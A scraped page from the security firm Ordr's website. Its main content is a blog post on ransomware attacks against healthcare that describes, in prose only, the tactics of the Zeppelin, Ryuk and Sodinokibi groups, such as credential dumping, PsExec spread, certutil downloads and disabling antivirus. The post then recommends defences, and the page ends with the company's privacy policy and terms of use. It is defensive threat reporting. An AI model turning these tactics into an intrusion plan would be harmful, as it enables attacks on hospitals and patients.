Chief Product Officer & Co-FounderPandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Ciscoâs multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a masterâs degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Awards and Recognition
Ready to Get Started?
-
BlogThe Rise of Ransomware in Healthcare
…Zepplin operators attempt to compromise the domain controller and once compromised they create a domain admin account to distribute the Zeppelin ransomware throughout the network. The domain admin account that…
Healthcare Security
The Rise of Ransomware in Healthcare
Tactics, Techniques, Procedures and Recommendations
8Min ReadBy Jeff Horne
Tactics, Techniques, Procedures and Recommendations of How to Triage
Perspective on the increase in ransomware attacks
Ransomware continues to make the headlines as researchers warn of a seven-fold increase compared to 2019. Healthcare is a very lucrative target, with attacks increasing by 350% in Q4 of 2019 (compared to Q4 2018) and continuing to rise through 2020. The pandemic provided a significant opportunity for any threat actor looking to target healthcare providers, as the focus shifted from a holistic look at patient care, health outcomes, experience, revenue, and security to health outcomes. In addition, there has been a mass influx in connected devices deployed in facilities without the proper purview of IT and Security teams, leading to an incomplete asset inventory and clear visibility of how/where devices are communicating.
Ransomware as a viable threat to healthcare organizations has led to sophisticated attackers with complex and targeted campaigns. The recent wave of ransomware campaigns looks more like a hands-on hack than an autonomous piece of malware propagating across the network. The operators facilitating the recent ransomware attacks are heavily incentivized to make sure their malware is extremely effective at propagating diverse networks. We have seen simple pieces of malware like trojan droppers install remote control functionality and backdoors which allow these ransomware operators to then get on to the healthcare network and then run tools like Cobalt Strike to privilege escalate themselves to admin. Once admin privileges have been granted, these ransomware operators begin turning off the malware detection and incident response programs on the infected devices. Weâve seen these operators use tools like Mimikatz to dump memory and gather local admin passwords or common user passwords on systems. Once common passwords have been gathered, the network is theirs for the taking. In organizations that use Remote Desktop Protocol (RDP) on workstations and servers, weâve seen these compromised local administrator accounts used to install and distribute the ransomware. Weâve also seen these attackers run PsExec and PowerShell scripts remotely by mounting remote shares (like IPC$ and C$) using the compromised credentials. If local or commonly utilized credentials cannot be gathered from initially infected host weâve seen them pivot to other hosts, or use common exploits kits to propagate throughout the network. These operators are skilled and unfortunately most healthcare providers and healthcare delivery organizations are trivial to compromise once these ransomware operators are inside.
Healthcare organizations that have vulnerable services on the edge of their network get compromised easily by autonomous scripts that are constantly scanning the internet. Once compromised, the script drops a payload that includes all of the tools the operators need for privilege escalation, exploitation, and lateral movement. Many healthcare organizations have flat networks, and utilize common local administrator accounts on largely unpatched systems. It is common to find legacy and largely unsupported operating systems like Windows XP running on both workstations and critical medical devices which cannot be patched and are running vulnerable services like SMBv1 that are available to the entire network. Simply put, once the initial compromise happens, it is largely trivial for these ransomware operators to infect an entire healthcare organization within a few hours.
Letâs discuss the 3 most common ransomware campaigns that are targeting healthcare providers and healthcare delivery organizations and what their TTPs are:
Zeppelin
Brief Description:
The Zeppelin ransomware is believed to be operated by a Russian cybercrime group however very little is known about the operators. The initial infection code checks to make sure it will not infect machines located in Belorussia, Kazakhstan, Russian Federation, or Ukraine. The Zeppelin ransomware code is largely is based on a purchasable ransomware variant known as VegaLocker which is available on multiple hacking and ransomware as a service websites and forums. The initial infections of Zeppelin began in the beginning of 2019.
What does a Zeppelin Compromise typically look like (TTPs):
- Typically, a spam or phishing email is received by an organization that includes an infected document that download and installs malware onto the system.
- Some initial infections appear to be Vidar Spyware or the CobaltStrike penetration tester toolkit.
- Recently the Zeppelin operators appear to be exploiting vulnerable RDP, Apache Tomcat, and Oracle Weblogic servers available on the internet.
- Once connected to the infected system the operators will install PowerShell scripts and PsExec.
- In some Zeppelin instances a legitimate remote desktop application called ScreenConnect is initially installed (if it doesnât already exist). The Zeppelin operators will connect to the ScreenConnect service and install the PowerShell scripts, privilege escalation tools, and PsExec.
- The Zeppelin operators will run a set of PowerShell Anti-Anti-Virus scripts and turn off logging to prevent detection and subsequently dump memory looking for local accounts that can be used to either propagate throughout the network or compromise the domain controller.
- Typically, the Zepplin operators attempt to compromise the domain controller and once compromised they create a domain admin account to distribute the Zeppelin ransomware throughout the network.
- The domain admin account that is typically created is called âSQLSvcâ.
- If the domain controller is difficult to compromise, they attempt to distribute the Zeppelin ransomware using compromised credentials dumped from memory of infected systems and propagate through file deployment and execution by PsExec.
- Once on the Domain Controller, they deploy a command to all connected devices to download Anti-Anti-Virus and Anti-Backup scripts along with the Zeppelin ransomware.
- The Zeppelin operators utilize the certutil command on Windows to download and infect machines with the scripts and ransomware.
- Finally, the scripts and Zeppelin ransomware is executed on all connected devices via PsExec.
Ryuk
Brief Description:
The Ryuk (aka Conti) ransomware is known to be operated by Russian cybercrime group. The Ryuk ransomware was largely based on a previous ransomware codebase known as Hermes which was possibly created by a North Korean hacking group and is purchasable from multiple hacking and ransomware as a service websites and forums. The Russian cybercrime group started targeting healthcare organizations in late 2018.
What does a Ryuk Compromise typically look like (TTPs):
- A spam or phishing email is received by an organization that includes an infected document that drops a trojan downloader/bot that includes several tools for remote access, privilege escalation, and lateral movement.
- The Ryuk operators gain access to the Emotet/TrickBot compromised machine typically through a PowerShell script that launches a reverse shell that connects to the Ryuk operators.
- Once on the infected system the Ryuk operators turn off all PowerShell logging and run Anti-Anti-Virus scripts to prevent detection.
- Common lateral movement, privilege escalation, and exploit kits are downloaded onto the infected machine.
- It is common for the Ryuk operators to utilize the PowerShell Empire post exploitation kit.
- The Ryuk operators dump the infected machines memory looking for local accounts that are used on Workstations and Servers throughout the network.
- If local credentials are not found, the operators will use common exploit kits.
- Lateral movement and infection happen either via RDP or through PsExec.
- Typically, the domain controller is initially targeted and if compromised the domain controllers will typically be used to distribute the scripts and Ryuk ransomware to all connected users/computers.
- Anti-Anti-Virus and Anti-Backup/Recovery scripts are run on soon to be infected machines in order to prevent both detection and recovery from the Ryuk ransomware.
- The Ryuk ransomware is deployed to all machines using PsExec and a local service is created and started to run the Ryuk binary.
- The Ryuk operators sometimes oversee the infection to ensure that it is successful and once infected they start emailing employees informing them of the infection and to reach out to them via an anonymous email where payments are later discussed. The payment amounts typically vary depending on the size and the revenue of the organization that is infected.
Sodinokibi/Sodin/REvil
Brief Description:
Sodinokibi (aka Sodin, REvil) is another ransomware-as-a-service operation which started in April of 2019 and is believed to be created and operated most likely by the same Russian group behind the popular GandCrab ransomware. In early 2019 the Sodinokibi group is believed to have hired affiliate hackers with a guaranteed payment of $50,000 USD and between 60% to 70% cut of the revenue after payments were secured from victims. The developers of this ransomware regularly post updates and new functionality to their code. Once installed, Sodinokibi ransomware initially looks for the computers language settings and will not infect if the set language is used in most former Soviet Union or Middle Eastern countries. The Sodinokibi ransomware has been seen using several TTPâs including manual and automated drive-by compromises using spam/phishing attacks, common exploits, and previously compromised passwords.
What does a Sodinokibi Compromise typically look like (TTPs):
- It is difficult to describe the typical attack method used to deploy the Sodinokibi ransomware as there are several which leads some security professionals to believe that Sodinokibi is being operated by multiple cybercrime organizations.
- Sodinokibi has been seen distributed as a spam or phishing email that is received by an organization that includes a heavily obfuscated malicious JavaScript that includes PowerShell scripts that will turn off logging, disable antivirus functionality, and ultimately installs the Sodinokibi ransomware.
- The Sodinokibi operators also appear to be exploiting vulnerable WebLogic and RDP servers available on the internet.
- After the initial infection the Sodinokibi operators drop various exploit and privilege escalations kits to laterally move throughout the network.
- Similar to Zeppelin the Sodinokibi operators typically use the certutil command on Windows to download their scripts, exploit kits, and ransomware payload to infected machines.
- Once infected with the Sodinokibi ransomware, the malicious binary deletes all file shadow copies on the infected system and disables recovery mode in order to ensure that the encrypted files could not be restored from a local backup.
- The Sodinokibi ransomware includes several persistence and Anti-Anti-Virus and Anti-Backup/Restore functionality making the installation easy. This functionality makes it more autonomous for the operators which is why we sometimes see Sodinokibi installed in simple drive by attacks on vulnerable internet facing servers and services.
One concerning tactic that most ransomware as a service operators are starting to employ is to exfiltrate several important files from an infected organization and threaten to both publicly disclose the breach and publish the important documents on their blogs typically hosted on the Dark Web. Weâve seen many ransomware operators publicly announce and release sensitive material for companies that did not pay the ransom.
Recommendations on using Ordr to Protect Against Ransomware
- Discover and identify your weak pointsâ
- Identify devices running legacy versions of Windows that are running SMBv1 (such as Windows XP and Windows 7) The Ordr IoT Discovery Program allows you to quickly identify these devices. In Ordrâs Rise of The Machines Report, we identified that 15-19 percent of our deployments had IoT devices running on legacy operating systems Windows 7 (or older).
- Identify devices with known vulnerabilities as attackers will try to exploit them them. Use Ordrâs built-in scanner or take advantage of our integration with vulnerability management solutions like Rapid7 and Tenable.
- Identify high-risk and vulnerable devices that cannot be patched. Using Ordr integration with winRM, you can identify device operating systems and status of patches.
- Enable proactive segmentationâ
- Using Ordr, systems that cannot be patched need to be isolated. Ordr allows you to easily create segmentation policies that restrict devices to only sanctioned communications required for their functions.
- Work with Ordr and our firewall and networking infrastructure partners to enforce these segmentation policies in your existing infrastructure.
- Monitor for Ransomware Indicatorsâ
- Identify anomalous communication using the Ordr Flow Genome. This can include discovery of sequential scans on the internal network, and anomalous SMB, RDP, and RPC communications utilized in lateral movement.
- Alert on common exploits and known ransomware payload URLs used in lateral movement such as EternalBlue.
- Alert on common C2 communications to known ransomware payload servers; when infected machines reach out to these malicious sites, the Ordr product will alert on them.
- Track user logon/logoff activities using Ordr. Our platform provides a mechanism to pull user logon and log off activities from Active Directory and also track locally created users. This allows you to ensure the right users have access to vulnerable machines and identify any anomalous user accounts created within the network by threat actors
If youâve already been attacked by ransomware, here are recommendations on how to deal with it, as described previously in this blog, A Primer on Preparing for and Responding to Ransomware for Users of IoT and IoMT. Note that with ransomware examples in this blog, there are no decryptors available at this time.
If you have questions about ransomware protection, please contact us at info@ordr.net. We work with a number of excellent integrators and managed security providers who specialize in protecting healthcare and other industries that are heavily invested in the use of connected devices.
Jeff Horne
Jeff Horne is currently the CSO at Ordr where he is responsible for security direction both within Ordr products and internal security. Prior to Ordr Jeff was the VP of Information Security for Optiv where he was responsible for all Security Operations, Governance Risk and Compliance, Endpoint, Internal Incident Response, Physical Security, and Employee Security Awareness groups. Before Optiv Jeff was the Senior Director of Information Security for SpaceX where he was responsible for the overall security strategy of SpaceX and managing the Information Security, Compliance (ITAR), Security Operations, and Physical Security groups. Previous to SpaceX Jeff was the Vice President of R&D and Chief Architect for Accuvant LABS where he managed teams of researchers and consultants specializing in reverse engineering, malicious code, incident response, breach analysis, and vulnerability assessment. Prior to Accuvant Jeff was the Director of Threat Research at Webroot Software where he led several teams of malware researchers, reverse engineers, and a development organization specializing in creating anti-malware functionality and detection signatures for all Webroot products. Jeff began his career as a Vulnerability Researcher at Internet Security Systems where he was responsible for vulnerability discovery, exploit creation, IDS evasion research, and behavioral detection of malware. Jeff is well known for his insight in interviews for numerous news channels and publications, speaking roles at various security conferences, as well as authoring several vulnerability disclosures and patents.
Interested in Learning More?
Subscribe today to stay informed and get regular updates from Ordr Cloud
Ready to Get Started?
- Typically, a spam or phishing email is received by an organization that includes an infected document that download and installs malware onto the system.
-
PagesPrivacy Policy
…our business purposes: Identifiers; Commercial information; Internet activity information; Financial information; and Inferences drawn from any of the above information categories. California law grants state residents certain rights, including the…
Privacy Policy
Last Updated: May 26th, 2022
The Ordr Privacy Policy was updated on May 26th, 2022.
Ordr, Inc. its affiliates and subsidiaries (collectively âOrdr,â âweâ, âourâ or âusâ) knows you care about how your Personal Information is used and shared, and we take your privacy seriously. Please read the following to learn more about our Privacy Policy. By using or accessing Ordrâs Website or by using any of Ordrâs hosted products (the âOrdr Solutionâ) or through communicating with Ordr regarding its software (the âOrdr Softwareâ) in any manner, you acknowledge that you accept the practices and policies outlined in this Privacy Policy, and you hereby consent that we may collect, use, and share your information in the following ways.
Changes to this Privacy Policy
Ordr may make changes to this Privacy Policy. The most current version of the Privacy Policy will govern Ordrâs use of information about you and will be located at https://www.ordr.net/privacy-policy. If Ordr makes material changes to this Privacy Policy, Ordr will notify you by posting a notice on our website and may send an email to the address Ordr has on file for your account, if applicable.
This Privacy Policy explains:
- Our privacy policy was updated on May 26, 2022
- Changes to this privacy policy
- The type of information we collect
- How Ordr collects your information; tracking and cookies
- How Ordr uses your information
- Correcting and updating your information
- Consent to commercial electronic messages
- Rights to object or restrict processing of Personal Information
- Right to be informed of appropriate safeguards where personal information is transferred to a third country or to an international organization
- Who we may share information with
- How we handle âDo Not Trackâ requests
- Linked sites and Ordr solution
- Data security
- Retention of your information
- Notice of privacy rights to California residents
- Notice of privacy rights to residents of the European Economic Area
- How to contact us
Type of Information we collect
Ordr may collect information that you provide to Ordr in connection with your use of the Ordr Solution or the Ordr Software when you:
- Register your account with Ordr as a user of the Ordr Software or the Ordr Solution (including through registration as an employee, contractor or other user of the Ordr Software or the Ordr Solution on behalf of a Ordr customer (âCustomerâ)
- Make changes to your user profile information
- Send email messages, forms, or other information to Ordr or other users using the Ordr Solution or the Ordr Software, or
- Install, use or otherwise interact with the Ordr Solution.
This information may include your first and last name, your address, email address, telephone number, your location, and any additional information you provide to Ordr during the account registration process or via the Ordr Solution.
Ordr may also collect certain technical information about your use of the Ordr Solution. This technical information may include technical information about your device(s), browser type and version, geo-location information, computer and connection information, statistics on page views, traffic to and from the Ordr Solution, ad data, Wi-Fi connection information, internet protocol (âIPâ) address, and standard web log information.
Additionally, when expressing an interest in obtaining additional information about the Ordr Solution or the Ordr Software or registering to use the Ordr Solution or the Ordr Software, we or a Customer may require you to provide us with personal contact information, such as your name, company name, address, phone number, and email address (âRequired Informationâ). Although Ordr uses third party service providers to process payments, when purchasing access to the Ordr Solution or the Ordr Software, we may require a Customer to provide our payment processing service providers with financial and billing information, such as billing name and address, credit card number, and the number of employees within the Customer that will be using the Ordr Solution or the Ordr Software (âFinancial Informationâ). We may also ask an actual or prospective Customer to provide additional information, such as company annual revenues, number of employees, or industry (âOptional Informationâ). Required Contact Information, Billing Information, and Optional Information about Customers are referred to collectively as
âCustomer Data.âHow Ordr Collects Your Information; Tracking and Cookies
When you register for an account with Ordr either directly or through a Customer, we may ask you to provide us with certain information in order to create your account, and to provide you with our Ordr Solution or the Ordr Software. This information is collected by us when you fill out forms that may be provided to you through the Ordr Solution.
Ordr, and third parties we interact with, including our third-party service providers, may use cookies, web beacons, hashed identifiers derived from email addresses for the purposes of cross-device tracking for targeted advertising, local shared objects (sometimes called âflash cookiesâ), and similar technologies in connection with your use of the Ordr Solution to provide and support the Ordr Solution (collectively referred to in this policy as âCookiesâ). Cookies are small data files that may have unique identifiers, and reside, among other places, on your mobile device, in emails we send to you, and on our applications. Locally shared objects or âflash cookiesâ are data files that can be created on your computer by the websites you visit and are a way for websites to store information for later use. Locally stored objects are different than cookies because they are stored in different parts of your computer than cookies. Web beacons are small strings of code that provide a method for delivering a graphic image on a web page or in an email message for the purpose of transferring data.
If Cookies are used, they may be used to collect information about you and your use of the Ordr Solution, such as your browser type, preferences, data relating to content that has been displayed to you or that you have clicked on, and the date and time of your use. Cookies may also be used in order to further features and processes on the Ordr Solution, provide authentication and security for your transactions using the Ordr Solution, store your preferences, facilitate relevant advertising, and help us learn more about how users engage with the Ordr Solution.
We sometimes use service providers to help us provide certain products and services or to integrate other features. These third-party providers may collect information when you view or use them, including information about you and your device or browser. They may do this using Cookies or similar technologies. These third-party providers also may use these technologies to help share information with us, like how you use their website or application. To learn more about the information they collect or receive, review their privacy policies.
As part of using our Ordr Solution, Ordrâs Customers may submit to Ordr electronic data or information (âSubmitted Dataâ) that constitutes personal information of other individuals. Such data may include an individualâs name, email address, phone number or any other data that the Customer chooses to submit to us. Ordr generally has no direct relationship with the individuals to whom Submitted Data may pertain. Ordr processes Submitted Data on behalf of our Customers and any uses of Customer Data by Ordr are done so pursuant to our Terms and Conditions or a separate agreement in place between Ordr and the applicable Customer, which governs our treatment of
Submitted Data.How Ordr Uses Your Information
Ordr may use your information to:
- Provide access to the Ordr Solution to communicate with you
- Personalize, customize, measure, and improve Ordrâs products, services, content, and advertising
- Prevent, detect, and investigate potentially prohibited or illegal activities or a breach of the applicable agreement(s) between you and Ordr
- Analyze the accuracy, effectiveness, and usability of the Ordr Solution or the Ordr Software
- Generate and review reports and data about Ordrâs user base and Ordr Solution usage patterns
- Compile aggregate data for internal and external business purposes
- Resolve disputes and troubleshoot problems; and
- Contact you with information, including promotional, marketing, and advertising information and recommendations that Ordr believes may be of interest to you.
Consistent with applicable laws, including United States CAN-SPAM laws, if you do not wish to receive commercial emails, you may unsubscribe following the instructions on any email. We may still send you administrative notices, however.
We endeavor to protect the privacy of your account and other Personal Information we hold in our records, but unfortunately, we cannot guarantee complete security. Unauthorized entry or use, hardware or software failure, and other factors, may compromise the security of user information at any time. In particular, you acknowledge that Ordr is not responsible for any loss of any passwords or login information which you receive for access to the Ordr Solution which results from your failure to keep that information secureCorrecting and Updating Your Information
Customers may update or change their account information through their account settings accessible using the Customer account page included in the Ordr Solution. Access to your Ordr account page will require your Ordr Solution username and password. To update your Information or to delete your account information, please email notices@Ordr.net.
You can access or change your profile and contact information or delete your account through the Ordr settings page. If you choose to delete or deactivate your account, you can no longer retrieve content or reactivate your account.
You have the right to request access to any Personal Information which Ordr may have about you by contacting notices@Ordr.com. The information will be provided in a machine-readable format. You may also ask that we transfer the Personal Information to a third party, which we will do if technically feasible.
You also have the right to review, add and update your Personal Information. You may also request the deletion of your Personal Information where- the personal information is no longer necessary in relation to the purposes for which it was collected or otherwise processed,
- you withdraw consent to Ordrâs possession of the information on which the processing is based and where there is no other legal ground for Ordrâs retention of the information,
- you object to Ordrâs possession of the information and there is no overriding legitimate basis for the retention,
- the personal information has been unlawfully obtained or processed, or
- the personal information has to be erased for compliance with a legal obligation in the European Union or other law to which Ordr is subject.
When you update information, however, we may maintain a copy of the unrevised information in our records. Some information may remain in our records after your deletion of such information from your account. We may use any aggregated data derived from or incorporating your Personal Information after you update or delete it, but not in a manner that would identify you personally.
If your individual personal information has been submitted to us by a Customer as Submitted Data and you wish to exercise any rights you may have to access, correct, amend, or delete such data, please first inquire with the Customer (or his/her organization) directlyConsent to Commercial Electronic Messages
If you provide us with an email address, you expressly consent to receiving Commercial Electronic Messages from Ordr about your use of the Website, the Ordr Solution, the Ordr Software and our Products. If you have any questions about Ordrâs Commercial Electronic Messages, you can contact Ordr at:
Ordr, Inc.
2445 Augustine Dr.
#601
Santa Clara, CA 95054
Attention: Privacy Officer or by emailing notices@ordr.netIn addition, you may opt out of receiving Commercial Electronic Messages at any time by emailing notices@ordr.net.
Rights to Object or Restrict Processing of Personal Information
If Ordr has your Personal Information as a result of your relationship with one of Ordrâs Customers, you should first contact that Customer before contacting Ordr. You may, however, at any time revoke your consent to the collection, processing and use of your Personal Information by emailing notices@Ordr.net. Upon receipt of your request, Ordr will delete your personal data provided Ordr may retain any data which is required for billing and accounting purposes or which is subject to legal retention requirements. In addition, if you discover any errors in data, you may contact us by emailing notices@Ordr.net and we will correct it. You can always opt not to disclose information to us, but keep in mind some information may be needed to take advantage of product features or may be required by your relationship with one of Ordrâs customers.
Right to be informed of appropriate safeguards where Personal Information is Transferred to a Third Country or to an International Organization
Ordr enters into agreements with its customers regarding the safeguards that have been put in place to protect your Personal Information for transfer outside of Switzerland or the European Economic Area. For transfers to countries without an adequacy decision by Switzerland or the European Commission, Ordr puts appropriate safeguards through contractual obligations..
Who We May Share Information With
Ordr may disclose the information we collect from you to the following third parties:
Users of the Ordr Solution; Public Information.
When you share information with us via the Ordr Solution, Ordr may share your information to other users, in accordance with the privacy settings you or the respective Customer has chosen for your account or that are applicable to that information. To the extent you share any information to a public audience or via a publicly accessible portion of the Ordr Solution such as an online customer community or forum, that information may be available to anyone who has access to that customer community or forum..Ordrâs solution Providers.
Ordr may share your information with third-party contractors, agents, collaborators, or service providers who provide certain services to Ordr or on Ordrâs behalf, such as operating and supporting the Ordr Solution. Ordr may also request your information from a previous service provider, which we need to provide our services to you. Alternatively, Ordr may pass on your information to a service provider that Ordr Customers have chosen to
replace Ordr.Companies that Acquire Ordrâs Business or Assets.
If Ordr becomes involved in a merger, acquisition, sale of assets, securities offering, bankruptcy, reorganization, or dissolution or if the ownership of all or substantially all of Ordrâs business relating to the Ordr Solution otherwise changes, Ordr may provide your information to a third party or parties in connection with the applicable transaction.Ordrâs Affiliates.
Ordr may share some or all of your information with Ordrâs parent company, subsidiaries and corporate affiliates, joint ventures or other companies under common control with Ordr.Ordr Customers.
If Ordr has received your information as part of Submitted Data, Ordr may share that information, or any modifications or revisions to that information with that Customer.Switching Ordr Solution Providers.
Ordr may request your information from your previous service provider, which we need to provide our services to you. Alternatively, Ordr may pass on your information to a service provider that you have chosen to replace Ordr.Aggregate Information.
Ordr may share information relating to our visitors and users with affiliated or unaffiliated third parties on an aggregate basis, however this information will not identify you personally.Legal Requirements.
Ordr may share your information with law enforcement, governmental agencies, or authorized third parties, in response to a request relating to a criminal investigation or alleged illegal activity or any other activity that may expose Ordr, you, or any other Ordr user to legal liability, or to protect Ordrâs rights or property, or during emergencies when safety is at risk. Ordr may also share your information in response to court orders, subpoenas, or other legal or regulatory requests, and Ordr may provide access to your information to Ordrâs legal counsel and other consultants in connection with actual or potential litigation. Ordr shall remain liable under the Principles if its agent processes such personal information in a manner inconsistent with the Principles, unless Ordr proves that it is not responsible for the event giving rise to the damage.How We Handle âDo Not Trackâ Requests
You may be able to adjust your browser settings or other settings so that âdo not trackâ requests are sent to our websites and mobile applications. Ordr does not use any tracking technology that would respond to any âdo not trackâ requests that are sent to our services. Ordr does not collect personally identifiable information about your online activities over time and across different websites when you use the Ordr Solution; however, certain service providers that use Cookies may collect your personally identifiable information over time and across
different websites.Linked Sites and Ordr Solution
Ordrâs website or application may, from time to time, contain links to and from the websites of our partner networks, advertisers and affiliates. If you follow a link to any of these websites, please note that these websites have their own privacy policies and that we do not accept any responsibility or liability for these policies. Please check these policies before you submit any personal data to these websites.
Data Security
Ordr takes reasonable measures to protect the information you provide to Ordr or submit through the Ordr Solution against misuse, loss, theft, unauthorized use, disclosure, or modification. Unfortunately, the transmission of information via the internet is not completely secure. Although we will do our best to protect your personal data, we cannot guarantee the security of your data transmitted to our site; any transmission is at your own risk and your information may be disclosed to third parties in unforeseeable situations or situations that are not preventable even when commercially reasonably protections are employed, such as in the case that Ordr or if the Ordr Solution are subject to a hacking or other attack. Once we have received your information, we will use strict procedures and security features to try to prevent unauthorized access.
Retention of Your Information
We retain information about you only for as long as it is necessary and relevant for Ordrâs operations, and for Ordrâs customers to work with their consumers. Information about you that is no longer necessary and relevant for Ordrâs operations will be disposed of securely. Ordr may also retain information collected from you to comply with the law, prevent fraud, resolve disputes, troubleshoot problems, assist with any investigation, and take other actions permitted by law or disclosed in this Privacy Policy.
Notice of Privacy Rights to California Residents
TThe California Consumer Privacy Act requires businesses to disclose whether they sell Personal Data. As a business covered by the CCPA, we do not sell Personal Data. We may share Personal Data with third parties or allow them to collect Personal Data from our sites or Services if those third parties are authorized service providers or business partners who have agreed to our contractual limitations as to their retention, use, and disclosure of such Personal Data, or if you use Ordr sites or Services to interact with third parties or direct us to disclose your Personal Data to third parties.
California law requires that we detail the categories of Personal Data that we disclose for certain âbusiness purposes,â such as to service providers that assist us with securing our services or marketing our products, and to such other entities as described in Sections 8 and 10 of this Privacy Statement. We disclose the following categories of Personal Data for our business purposes:Identifiers;
Commercial information;
Internet activity information;
Financial information; and
Inferences drawn from any of the above information categories.
California law grants state residents certain rights, including the rights to access specific types of Personal Data, to learn how we process Personal Data, to request deletion of Personal Data, and not to be denied goods or services for exercising these rights.
If you are a California resident under the age of 18, you may ask us to remove content or information that you have posted to our website(s). Please note that your request does not ensure complete or comprehensive removal of the content or information, because, for example, some of your content may have been reposted by another user.
For information on how to exercise your rights, please refer to Section 15 of this Privacy Statement. If you are an authorized agent wishing to exercise rights on behalf of a California resident, please contact us using the information in the âContacting Usâ section above and provide us with a copy of the consumerâs written authorization designating you as their agent.
We may need to verify your identity and place of residence before completing your rights request.Notice of Privacy Rights to Residents of the European Economic Area
You have the right to ask us not to process your personal data for marketing purposes. We will usually inform you (before collecting your data) if we intend to use your data for such purposes or if we intend to disclose your information to any third party for such purposes. You can exercise your right to prevent such processing by checking certain boxes on the forms we use to collect your data. You can also exercise the right at any time by contacting us at notices@Ordr.net.
How to Contact Us
If you have questions or complaints regarding Ordrâs Privacy Policy or practices, please contact notices@Ordr.net or via postal mail at
Ordr, Inc.
2445 Augustine Dr.
#601
Santa Clara, CA 95054
Attention: Privacy Officer -
PagesTerms of Use
…otherwise attempts to obtain the source code or underlying ideas or information of or relating to the Website. A violation of any of the foregoing is grounds for termination of…
Terms of Use
Last Updated: September 27, 2022
PLEASE NOTE THAT YOUR USE OF AND ACCESS TO OUR WEBSITE (DEFINED BELOW) ARE SUBJECT TO THE FOLLOWING TERMS; IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE WEBSITE IN ANY MANNER.
Welcome to Ordr, Inc.âs website. Please read on to learn the rules and restrictions that govern your use of our website(s) (the âWebsiteâ). If you have any questions, comments, or concerns regarding these terms or the Website, please contact us at info@ordr.net.
These Terms of Use (the âTermsâ) are a binding contract between you and Ordr, Inc. (âOrdr,â âweâ and âusâ). You must agree to and accept all of the Terms, or you donât have the right to use the Website. If you use the Website in any way, you agree to all of these Terms, and these Terms will remain in effect while you use the Website. These Terms include the provisions in this document, as well as those in the Ordr Privacy Policy.Will these Terms ever change?
We are constantly trying to improve our Website, so these Terms may need to change along with the Website. We reserve the right to change the Terms at any time, but if we do, we will bring it to your attention by placing a notice on the Website, and/or by sending you an email and/or by some other means.
If you donât agree with the new Terms, you are free to reject them; unfortunately, that means you will no longer be able to use the Website. If you use the Website in any way after a change to the Terms is effective, that means you agree to all of the changes.
Except for changes by us as described here, no other amendment or modification of these Terms will be effective unless in writing and signed by both you and us.What about my privacy?
Ordr takes the privacy of its users very seriously. For the current Ordr Privacy Policy Is posted on the www.ordr.net.
The Childrenâs Online Privacy Protection Act (âCOPPAâ) requires that online service providers obtain parental consent before they knowingly collect personally identifiable information online from children who are under 13. We do not knowingly collect or solicit personally identifiable information from children under 13; if you are a child under 13, please do not attempt to use the Website or send any personal information about yourself to us. If we learn we have collected personal information from a child under 13, we will delete that information as quickly as possible. If you believe that a child under 13 may have provided us personal information, please contact us at info@ordr.net.What are the basics of using the Website?
You represent and warrant that you are of legal age to form a binding contract (or if not, youâve received your parentâs or guardianâs permission to use the Website and gotten your parent or guardian to agree to these Terms on your behalf). If youâre agreeing to these Terms on behalf of an organization or entity, you represent and warrant that you are authorized to agree to these Terms on that organization or entityâs behalf and bind them to these Terms (in which case, the references to âyouâ and âyourâ in these Terms, except for in this sentence, refer to that organization or entity).
You will only use the Website for your own internal, personal, non- commercial use, and not on behalf of or for the benefit of any third party, and only in a manner that complies with all laws that apply to you. If your use of the Website is prohibited by applicable laws, then you arenât authorized to use the Website. We canât and wonât be responsible for your using the Website in a way that breaks the law.
Your use of the Website is subject to the fact that You represent, warrant, and agree that You will not contribute any Content or User Submission (each of those terms is defined below) or otherwise use the Website or interact with the Website in a manner that:(a) Infringes or violates the intellectual property rights or any other rights of anyone else (including Ordr);
(b) Violates any law or regulation;
(c) Is harmful, fraudulent, deceptive, threatening, harassing, defamatory, obscene, or otherwise objectionable;
(d) Violates the security of any computer network, or cracks any passwords or security encryption codes;
(e) Runs Maillist, Listserv, any form of auto-responder or âspamâ on the Website, or any processes that run or are activated while you are not logged into the Website, or that otherwise interfere with the proper working of the Website (including by placing an unreasonable load on the Website infrastructure);
(f) âCrawls,â âscrapes,â or âspidersâ any page, data or portion of or relating to the Website or Content (through use of manual or automated means);
(g) Copies or stores any significant portion of the Content and/or share, post or distribute any significant portion of the Content elsewhere;
(h) Decompiles, reverse engineers, or otherwise attempts to obtain the source code or underlying ideas or information of or relating to the Website.A violation of any of the foregoing is grounds for termination of your right to use or access the Website.
What are my rights in the Website?
The materials displayed or performed or available on or through the Website, including, but not limited to, text, graphics, data, articles, photos, images, illustrations, user submissions, and so forth (all of the foregoing, the âContentâ) are protected by copyright and/or other intellectual property laws. You promise to abide by all copyright notices, trademark rules, information, and restrictions contained in any Content you access through the Website, and you wonât use, copy, reproduce, modify, translate, publish, broadcast, transmit, distribute, perform, upload, display, license, sell or otherwise exploit for any purpose any Content not owned by you, (i) without the prior consent of the owner of that Content or (ii) in a way that violates someone elseâs (including Ordrâs) rights.
You understand that Ordr owns the Website. You wonât modify, publish, transmit, participate in the transfer or sale of, reproduce (except as expressly provided in this Section), creative derivative works based on, or otherwise exploit any of the Website.
The Website may allow you to copy or download certain Content; please remember that just because this functionality exists, doesnât mean that all the restrictions above donât applyâthey do!Who is responsible for what I see and do on the Website?
You access all information and content posted or transmitted through the Website at your own risk, and we arenât liable for any errors or omissions in that information or content or for any damages or loss you might suffer in connection with it. We cannot control and have no duty to take any action regarding how you may interpret and use the Content or what actions you may take as a result of having been exposed to the Content, and you hereby release us from all liability for you having acquired or not acquired Content through the Website. We canât guarantee the identity of any users with whom you interact in using the Website and are not responsible for which users gain access to the Website.
You are responsible for all Content you provide, in any manner, via the Website, and you represent and warrant you have all rights necessary to do so, in the manner in which you provide it. You are responsible for all your activity in connection with the Website.
The Website may contain links or connections to third party websites or services that are not owned or controlled by Ordr. When you access third party websites or use third party services, you accept that there are risks in doing so, and that Ordr is not responsible for such risks. We encourage you to be aware when you leave the Website and to read the terms and conditions and privacy policy of each third party website or service that you visit or utilize.
